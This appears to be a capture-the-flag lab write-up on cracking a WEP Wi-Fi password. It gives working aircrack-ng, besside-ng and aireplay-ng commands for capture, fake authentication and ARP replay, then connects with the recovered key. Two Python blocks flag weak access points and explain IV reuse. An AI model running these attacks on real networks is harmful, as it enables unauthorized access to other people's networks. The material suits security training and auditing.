WEP
How to hack WEP wifi Passwords
07. Get wifi-old password
Get wifi-old password. FLAG: Pass in hex
In the following screenshot we can see how the AP has a client connected with traffic.
sudo airodump-ng wlan0mon --manufacturer --wps -c 3

The network is a WEP with a client, so we can use besside-ng to get the password automatically.
airmon-ng check kill
sudo besside-ng -c 3 -b F0:9F:C2:71:22:11 wlan2 -v
1. sudo (Run as Root): besside-ng requires root privileges to access wireless interfaces, so sudo is needed.
2. besside-ng (Automated WEP/WPA Attack Tool): a tool that automatically captures handshakes for WPA/WPA2 networks and cracks WEP encryption.
3. -c 3 (Target Channel 3): forces besside-ng to only scan and attack Wi-Fi networks on channel 3. Useful for faster attack execution instead of scanning all channels.
4. -b F0:9F:C2:71:22:11 (Target Specific BSSID): F0:9F:C2:71:22:11 is the BSSID (MAC address of the target router/AP). Ensures besside-ng attacks only this specific access point rather than scanning for all available networks.
5. wlan2 (Wireless Interface): specifies that wlan2 is the wireless adapter being used.
6. -v (Verbose Mode): enables detailed output for better tracking of the attack progress.


Alternate Method
In case we want to do it manually:
There is a client active on this WEP network. This makes it easier to capture enough data to crack the password.
Capture data into a file; this file is the input for aircrack-ng to crack the password.
sudo airodump-ng -c 3 --bssid F0:9F:C2:71:22:11 -w wifi-old wlan0mon
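Besides the .cap file, airodump-ng -w wifi-old also writes a CSV summary (wifi-old-01.csv) listing every access point it saw, including its Privacy column. The following Python script is an added example, not part of this write-up: it reads that CSV export and flags access points still running WEP or no encryption at all, which is the inventory check a network owner would run over the same scan data. The column order it assumes is the one airodump-ng uses for the AP section (BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key); the sample rows embedded below are constructed for this example.

```python
"""Flag legacy-encryption access points in an airodump-ng CSV export.

Added example (not part of the original write-up). airodump-ng -w <prefix>
writes <prefix>-01.csv next to the .cap file; its first section lists one AP
per line. The column order assumed here is airodump-ng's AP header:
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key.
The sample rows below are constructed for this example.
"""
import csv
import io

# Constructed sample resembling the AP and station sections of an airodump-ng CSV file.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
F0:9F:C2:71:22:11, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  3,  54, WEP , WEP, OPN, -40,      120,     3500,   0.  0.  0.  0,   8, wifi-old, 
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6, 130, WPA2, CCMP, PSK, -55,       90,        0,   0.  0.  0.  0,  10, corp-guest, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, OPN , , , -70,       40,        0,   0.  0.  0.  0,   7, cafe-ap, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -50, 800, F0:9F:C2:71:22:11, wifi-old
"""

# Privacy values that should never appear on a managed network.
WEAK_PRIVACY = ("WEP", "OPN")


def parse_access_points(text):
    """Return the AP rows (as dicts keyed by column name) from the first CSV section."""
    ap_section = text.split("\n\n", 1)[0]  # the station table follows a blank line
    reader = csv.DictReader(io.StringIO(ap_section), skipinitialspace=True)
    rows = []
    for row in reader:
        # Strip padding; drop the None key csv uses for surplus fields.
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k})
    return rows


def find_weak_aps(text):
    """List (bssid, essid, privacy, iv_count) for APs using WEP or no encryption."""
    findings = []
    for ap in parse_access_points(text):
        privacy = ap["Privacy"].upper()
        # Substring match also catches airodump's tentative "WEP?" marking.
        if any(tag in privacy for tag in WEAK_PRIVACY):
            findings.append((ap["BSSID"], ap["ESSID"], privacy, int(ap["# IV"])))
    return findings


if __name__ == "__main__":
    for bssid, essid, privacy, ivs in find_weak_aps(SAMPLE_CSV):
        print(f"{bssid} {essid!r}: {privacy} (IVs seen: {ivs})")
```

Pointing the script at a real export is a matter of replacing SAMPLE_CSV with the contents of wifi-old-01.csv; the "# IV" count it reports for a WEP AP is the same figure airodump-ng shows in its #Data column, and a WEP AP with an associated station and a growing IV count is exactly the situation this write-up describes.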

To generate some extra data, we can launch a fake authentication against the AP (at the same time):
sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0mon
1. sudo (Run as Root): required because aireplay-ng needs administrative privileges to interact with the network card.
2. aireplay-ng (Packet Injection Tool): part of the Aircrack-ng suite, used to inject packets into a wireless network.
3. -1 (Fake Authentication Mode): used to authenticate with a WEP-protected access point (AP). Needed when the AP requires client authentication before allowing traffic.
4. 3600 (Keep Connection for 3600 Seconds): sets the fake authentication timeout to 3600 seconds (1 hour). Ensures the attack stays authenticated for a longer period.
5. -q 10 (Quiet Mode, Sends Authentication Every 10 Seconds): sends keep-alive authentication requests every 10 seconds to stay connected. Prevents the AP from disconnecting the fake client.
6. -a F0:9F:C2:71:22:11 (Target BSSID): specifies the MAC address of the target access point (AP).
7. wlan0mon (Monitor Mode Interface): the wireless interface in monitor mode (previously enabled using airmon-ng).

And generate some traffic by launching an ARP-request replay attack (at the same time):
sudo aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0mon
1. sudo (Run as Root): executes the command with root privileges, which is necessary for packet injection and monitoring.
2. aireplay-ng (Packet Injection Tool): part of the Aircrack-ng suite, this tool is used to inject packets into the wireless network.
3. --arpreplay (ARP Replay Attack): this option injects captured ARP (Address Resolution Protocol) packets into the network. The goal is to force the target access point (AP) to generate more initialization vectors (IVs). The injected ARP packets trigger responses from the AP, which speeds up collecting enough IVs to crack WEP encryption.
4. -b F0:9F:C2:71:22:11 (Target BSSID): the BSSID (MAC address) of the target access point (AP). This is the AP that you are attacking, and you want to inject ARP packets towards this specific AP.
5. -h 02:00:00:00:00:00 (Source MAC Address): the source MAC address you are using in the attack. It represents the fake client MAC address. If the AP checks for authentication, this address should either match a legitimate client's MAC or be a spoofed MAC address to bypass security.
6. wlan0mon (Monitor Mode Interface): the monitor mode interface used to perform the attack. This interface allows you to capture and inject packets on the network. Make sure wlan0mon is in monitor mode (you can verify this with iwconfig).
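The reason the number of IVs is the bottleneck is that WEP prepends only a 24-bit IV to the shared key for every frame, so the AP has just 2^24 per-frame keystreams and starts repeating them long before that many frames are sent. The following Python block is an added example, not part of this write-up: it works out from the birthday bound how many frames are needed before an IV repeat becomes likely, and counts IV reuse per BSSID over a list of (bssid, iv) frame records. The records and the random-IV access point are constructed for the example; on a real assessment they would be extracted from the capture airodump-ng writes.

```python
"""Why the IV count matters for WEP: the 24-bit IV space and IV reuse.

Added example (not part of the original write-up). WEP prepends a 24-bit IV
to the key for each frame, so there are only 2**24 distinct per-frame
keystreams. This block computes how many frames it takes before an IV repeat
becomes likely (birthday bound) and counts IV reuse in a list of (bssid, iv)
records. The frame records are constructed for this example; in practice they
would be extracted from the capture written by airodump-ng.
"""
import math
import random
from collections import Counter

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 16,777,216 possible IVs per key


def frames_until_collision(probability=0.5, space=IV_SPACE):
    """Frames after which an IV repeat has at least the given probability.

    Uses the birthday approximation n = sqrt(2 * space * ln(1 / (1 - p)))."""
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def iv_reuse_report(frames):
    """Count reused IVs per BSSID.

    frames: iterable of (bssid, iv) tuples, one per WEP data frame.
    Returns {bssid: (total_frames, distinct_ivs, reused_ivs)} where
    reused_ivs is the number of IV values seen more than once."""
    per_bssid = {}
    for bssid, iv in frames:
        per_bssid.setdefault(bssid, Counter())[iv] += 1
    report = {}
    for bssid, counts in per_bssid.items():
        total = sum(counts.values())
        reused = sum(1 for c in counts.values() if c > 1)
        report[bssid] = (total, len(counts), reused)
    return report


def constructed_capture(n_frames, seed=1):
    """Constructed sample: one AP whose driver picks IVs uniformly from 2**24."""
    rng = random.Random(seed)
    return [("F0:9F:C2:71:22:11", rng.randrange(IV_SPACE)) for _ in range(n_frames)]


if __name__ == "__main__":
    print("50% chance of an IV repeat after", frames_until_collision(0.5), "frames")
    print("99% chance of an IV repeat after", frames_until_collision(0.99), "frames")
    total, distinct, reused = iv_reuse_report(constructed_capture(20000))["F0:9F:C2:71:22:11"]
    print(f"{total} frames, {distinct} distinct IVs, {reused} IVs reused")
```

A few thousand frames, well under a minute of ARP traffic, is enough for the first IV repeat even with random IV selection, and drivers that count IVs sequentially from zero are worse, since every reboot restarts the same sequence. Any reuse at all in the report is a finding: it is the property the write-up exploits, and the reason the fix for a WEP network is migration to WPA2/WPA3 rather than a longer key.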

While this is running (at the same time), we can try to crack the password with the data captured by the earlier airodump-ng command:
sudo aircrack-ng wifi-old-01.cap

Once we have the password we can connect to the WEP network:
Create a configuration file to connect to the WEP network.
nano wep.conf
The content should look like this.
network={
ssid="wifi-old"
key_mgmt=NONE
wep_key0=11BB33CD55
wep_tx_keyidx=0
}
Now we can connect to the WEP network with our configuration file.
sudo wpa_supplicant -D nl80211 -i wlan2 -c wep.conf
We should try to retrieve an IP address from the DHCP server.
sudo dhclient wlan2 -v

And now we can access http://192.168.1.1 to verify that we are connected.
